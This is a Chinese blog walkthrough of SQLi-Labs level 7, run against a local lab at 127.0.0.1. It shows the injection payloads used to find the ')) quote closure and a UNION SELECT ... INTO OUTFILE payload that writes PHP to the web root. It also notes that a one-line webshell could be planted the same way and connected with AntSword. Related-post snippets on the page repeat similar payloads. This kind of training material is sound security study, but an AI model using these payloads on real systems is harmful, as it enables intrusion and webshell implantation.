Less-7 【outfile】

最新推荐文章于 2024-06-09 15:52:11 发布
最新推荐文章于 2024-06-09 15:52:11 发布
阅读量231 收藏 1
点赞数
分类专栏: Sqli-Labs 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45939134/article/details/130779837
版权
文章详细描述了在第七关的SQL注入问题中,通过测试不同闭合方式,发现输入参数id使用的是单引号和两个括号进行闭合。通过添加探针并写入PHP代码到服务器,验证了SQL注入的可行性,提到了利用蚁剑等工具进行webshell连接。
摘要由CSDN通过智能技术生成

目录

第七关

1、正常输入?id=1

2、加单引号外加注释查看报错,发现它只提示了语法错误,并没有具体错误信息

3、加双引号外加注释查看报错,发现并没有报错是正常页面

4、分析闭合方式

5、我们试两个括号的时候发现页面恢复正常,这就说明它是由一个单引号和两个括号的方式进行闭合

6、我们写入一个探针,并且查看是否浏览成功。

第七关

首先我们修改mysql中的my.ini文件,给文件中写入secure_file_priv="/"

1、正常输入?id=1

2、加单引号外加注释查看报错,发现它只提示了语法错误,并没有具体错误信息

第七关

首先我们修改mysql中的my.ini文件,给文件中写入secure_file_priv="/"

1、正常输入?id=1

2、加单引号外加注释查看报错,发现它只提示了语法错误,并没有具体错误信息

127.0.0.1:8080/sqli/Less-7/?id=1' --+

3、加双引号外加注释查看报错,发现并没有报错是正常页面

127.0.0.1:8080/sqli/Less-7/?id=1" --+

4、分析闭合方式

由上面的信息我们可知我们输入参数id时它是用单引号封闭的,然后我们单引号破坏了它原有的语法结构。

但是如果只是单引号闭合的话它不会出现报错,那我们就知道它肯定还有什么符合在外面包裹着单引号。

我们试一下单个括号、两个括号看看。

5、我们试两个括号的时候发现页面恢复正常,这就说明它是由一个单引号和两个括号的方式进行闭合

127.0.0.1:8080/sqli/Less-7/?id=1')) --+

6、我们写入一个探针,并且查看是否浏览成功。

union select 1,2,"<?php phpinfo(); ?>" into outfile "D:/phpstudy_pro/WWW/sqli/Less-7/1.php"--+

我们还可以写一句话木马然后利用蚁剑等webshell工具进行连接即可

到此闯关完成,闯关结束。

'tubug'
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sqli-labs Less-7 Dump into outfile sql注入读写文件
bigblue00的博客
06-16 1697
Less-7 Dump into outfile sql注入读写文件 SQL语句只要正确就会输出 You are in … 错误就会输出You have an error in your SQL syntax 本例主要练习SQL注入读写文件 1、先了解一个语句: into outfile 语句用于把表数据导出到一个文本文件中 要想mysql用户对文件进行导入导出,首先要看指定的权限目录 mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE,
sqli-labs靶场Less-7
songling515010475的专栏
08-21 340
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。 1、访问首页,/Less-7/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下: 结果1: 结果2: 分析:这里我尝试不管是怎么样,通过...
【SQLi-LABS】Less-7 Dump into Outfile解题记录
自知.的博客
08-02 673
sqli-labs的less7题题解,详述使用outfile命令导出关键信息、使用布尔脚本进行注入。步骤详尽,具有学习、参考意义。
sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置
Superstacks超全栈
06-09 446
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。只有列号为3的时候,才能正常显示,则字段长度为3。进入页面中,并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。
【SQLi-Labs】Less-7 Dump into Outfile
xw1995115的博客
11-15 1016
关于本节的注入方法,题目给出了很明显的提示,利用SQL写入文件,利用文件获取webshell。 本节前提有2个: 1.mysql配置文件对读取和写入没有严格控制的情况,即my.cnf中有一条这样的配置 secure_file_priv="/" 2.文件写入目录的绝对路径已知;绝对路径我们可以利用Less-1的页面去读取。 /Less-1/?id=-1' union select 1,@@basedir,@@datadir --+ 有了这两个前提就可以通过写入文件获取服务器权限了 ...
sqli-labs-Less7-关于outfile
feng的博客
09-23 353
这题学习了关于SQL注入中outfile的姿势。 语句是这样: SELECT.....INTO OUTFILE 'file_name' 必须 拥有FILE权限,才能使用此语法。还有file_name 不能是一个已经存在的文件。 这样就可以把select的内容写进文件中。 在进行之前还要看看一个东西,就是secure_file_priv。因为Mysql数据库需要在指定的目录下进行数据的导出,而这个指定的目录就是由这个参数设置的。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,Mysql
Sqli-labs之Less-7
→_→
03-26 1648
Less-7 GET - 导入文件- 字符串 分析数字型/字符型及单/双引号注入: 我们可以分别尝试将 ?id=1 ?id=1' ?id=1"添加到url中,进行测试,发现?id=1'报错,初步判断为字符型注入,经过测试后发现正常返回 You are in.... U...
sqli-labs:less-7
羽的博客
07-14 319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs-less-7 使用outfile函数写入一句话木马
yzcn
10-30 1733
Less-7 一句话木马 判断注入点: 127.0.0.1/sqli-labs-master/Less-7/?id=1 显示正常 提示:You are in… Use outfile… 127.0.0.1/sqli-labs-master/Less-7/?id=1’ 显示错误,错误信息:You have an error in your SQL syntax 。。。。。。 127.0.0.1/sqli-labs-master/Less-7/?id=1’)) 显示错误 127.0.0.1/sqli-l
sqlilabs—less-7—SQL注入写webshell
一个普普通通的博客
03-15 2044
SQL注入写webshell
datapackage-outfile-js:从数据包对象输出文件
05-15
"datapackage-outfile-js"是一个专门针对JavaScript的库,它提供了一种从数据包(Data Package)对象输出文件的功能。这个库对于数据处理和分析的开发者来说非常有用,特别是那些需要管理和操作大量结构化数据的项目...
outfile.sql
09-05
outfile.sql
qt-faststart.7z
02-16
qt-faststart是FFmpeg下的一个小工具,可以将mp4视频文件的元数据提取到前面,解决部分播放器下整个文件加载完才能播放的问题。 ... 资源包内包含编译好的qt-faststart.exe...qt-faststart <infile.mov> <outfile.mov>
Go-Raisimageserver-一个兼容IIIF的图片瓦片开源服务器
08-14
**正文** 《Go-RaisimageServer:打造兼容IIIF的高效图片瓦片服务》 在IT行业中,图像处理是一项至关重要的任务,特别是在数字图书馆、在线艺术展览和学术研究等领域。IIIF(International Image Interoperability...
Go-gen-类型驱动的Go代码生成工具
08-14
《Go-gen:类型驱动的Go代码生成工具深度解析》 在Go编程语言的世界里,代码生成工具能够极大地提高开发效率,减少重复工作,确保代码一致性。"Go-gen"就是这样一款强大的工具,它以类型驱动的方式生成Go代码,帮助...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8412
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
H为供应链的变革、模式和方法.pdf
最新发布
08-24
H为供应链的变革、模式和方法.pdf
java源码资源很强的Java加密解密算法源码
08-24
java源码资源很强的Java加密解密算法源码提取方式是百度网盘分享地址
五、前后端分离通用权限系统(5)gansu-system-front.zip
08-24
五、前后端分离通用权限系统(5)gansu-system-front.zip
sqli-labs-less-7
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来实现注入。 根据引用和引用提供的信息,我们可以得出以下步骤: 1. 构造注入语句:在URL参数中使用单引号来闭合原始查询,然后使用UNION SELECT语句来执行额外的SQL查询。在这个例子中,注入语句是?id=-1')) union select 1,user(),database()。 2. 将查询结果导出到文件中:使用INTO OUTFILE语句将注入的查询结果导出到指定的文件路径。在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

'tubug'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值